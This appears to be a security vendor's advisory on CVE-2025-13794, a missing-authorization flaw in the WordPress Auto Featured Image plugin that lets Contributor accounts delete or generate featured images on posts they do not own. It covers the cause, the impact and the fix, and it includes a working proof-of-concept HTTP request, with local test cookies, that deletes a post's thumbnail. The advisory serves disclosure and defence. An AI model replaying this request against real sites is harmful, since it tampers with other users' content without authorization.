CVE-2025-13794 – Auto Featured Image – Missing Authorization to Authenticated (Contributor+) Post Thumbnail Modification – POC

CVE-2025-13794 is an Incorrect Authorization / Missing Authorization (CWE-862) vulnerability in the WordPress plugin Auto Featured Image (Auto Post Thumbnail) that breaks WordPress’ object-level access control for post thumbnails when bulk actions are used from the Posts list screen. The vulnerability affects all versions up to and including 4.2.1, and it allows authenticated attackers with Contributor-level access or higher to delete or generate featured images on posts they do not own, effectively enabling cross-user content tampering without the normal “can you edit this specific post?” gate. Because the plugin is widely deployed (WordPress.org shows 50,000+ active installations), this kind of low-privilege workflow bypass has real operational impact on multi-author sites, editorial teams, and any WordPress environment that relies on role separation to protect content integrity.

CVE	CVE-2025-13794
Plugin Version	Auto Featured Image <= 4.2.1
All Time	1 805 023
Active installations	50 000+
Publicly Published	December 15, 2025
Last Updated	December 15, 2025
Researcher	Dmitrii Ignatyev
PoC	Yes
Exploit	No
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13794 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/auto-post-thumbnail/auto-featured-image-421-missing-authorization-to-authenticated-contributor-post-thumbnail-modification https://t.me/cleantalk_researches/368
Plugin Security Certification by CleanTalk
Logo of the plugin

Join the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.

Get Plugin Security Certificate

PSC by Cleantalk

Timeline

Discovery of the Vulnerability

Public vulnerability records describe the root cause as a missing capability check inside the plugin’s bulk action handler (commonly referenced as bulk_action_generate_handler), where requests that perform thumbnail operations do not enforce per-post authorization. In WordPress terms, the handler processes selected post IDs from the bulk action submission and applies actions like “delete featured image” or “generate featured image” without calling current_user_can('edit_post', $post_id) for each targeted post, which is exactly the check WordPress uses to enforce author ownership boundaries and role-based restrictions at the object level. The NVD entry explicitly states that this missing capability check enables authenticated Contributor+ attackers to delete or generate featured images on posts they do not own, which aligns with the practical workflow you outlined using the Posts list bulk actions and a reusable bulk nonce. 

Understanding of Missing Authorization attack’s

At a security-model level, this bug is a textbook horizontal privilege escalation against content metadata: the attacker is not “becoming an admin,” but they are gaining the ability to modify an object they should be forbidden to change. In WordPress, featured images are not cosmetic trivia—they are often the primary visual representation of a post across the homepage, category archives, Open Graph/social previews, “featured content” blocks, and newsletter thumbnails, so manipulating them can directly alter what the public sees and how a site’s content is perceived. CVE-2025-13794 is particularly important because bulk actions are a trusted, high-throughput administrative mechanism; when a plugin hooks bulk processing without per-item authorization checks, it effectively allows a low-privileged user to “apply admin-like batch edits” to objects outside their scope. The CVE is mapped to CWE-862 (Missing Authorization), reinforcing that the flaw is not about input formatting or nonce presence, but about failing to enforce the correct authorization decision for each target post. 

Exploiting the Missing Authorization Vulnerability

To exploit CVE-2025-13794, an attacker with Contributor+ cookies:

POC:

POST /wordpress/wp-admin/edit.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/edit.php?paged=1&apt_bulk_action=1
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=2%7C1763659810%7CuvFpCfURypDUIn9dSyAh52B5N2LMoeGldyXJhb27pI3%7C0d4a48167be49ae085c8f07ff43ae432ada4134a5e119fb6436450e3705168a9; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=2%7C1763659810%7CuvFpCfURypDUIn9dSyAh52B5N2LMoeGldyXJhb27pI3%7Ca3113b5a10aaf58542fac68a5095be2d5b6b8dcaa1189c205d87a443a29f4d60; wp-settings-time-3=1763487015; wp-settings-3=libraryContent%3Dapt
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

_wpnonce=nonce_from_posts-filter__wpnonce&post%5B%5D=79&action=apt_delete_thumb

____

The impact of CVE-2025-13794 is primarily integrity damage and content disruption, with a practical “defacement-lite” profile: attackers can remove a featured image from a high-visibility post, force a generated image that doesn’t match editorial intent, or trigger automated image replacement behaviors (depending on configuration) to change how posts render on key templates. On sites where featured images drive homepage cards, hero banners, and social preview cards, even a single unauthorized thumbnail change can produce reputational harm, confuse readers, and create downstream operational load for editors who must audit and restore visuals across multiple posts. Because the action is low-friction and can be repeated across many post IDs through bulk selection parameters, a malicious Contributor account (or a compromised one) can cause widespread visual disruption quickly—especially on multi-author news/blog sites where role separation is the primary control preventing authors from modifying each other’s content. The NVD record characterizes the vulnerability as unauthorized modification of data due to missing capability checks, which captures the essence: it is a permission boundary failure, not merely a UI quirk. 

Recommendations for Improved Security

The correct fix is to enforce object-level authorization for every post ID in the bulk action payload before performing any thumbnail operation, and to fail closed if the caller lacks permission for any targeted object. Specifically, the handler should validate each post_id as an integer, confirm the post exists, and require current_user_can('edit_post', $post_id) (or the equivalent mapped capability for the post type) before calling delete_post_thumbnail(), triggering generation, or invoking replace logic; this is the missing guardrail identified in the CVE summary for the vulnerable bulk action handler. From a defensive operations standpoint, site owners should update beyond the affected range (NVD: ≤ 4.2.1 is vulnerable) and treat this as a role-separation regression test: if your site relies on Contributors/Authors, audit whether they can access bulk actions and consider temporarily restricting roles or tightening editorial workflows until patched. Since exploitation depends on authenticated access, also review account hygiene (remove unused authors, enforce MFA where possible, monitor unexpected bulk-action submissions), because authorization bugs become dramatically easier to exploit when low-priv accounts are abundant. 

By taking proactive measures to address Missing Authorization vulnerabilities like CVE-2025-13794 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.

#WordPressSecurity #MissingAuth #WebsiteSafety #StayProtected #HighVulnerability

Use CleanTalk solutions to improve the security of your website

Dmitrii I.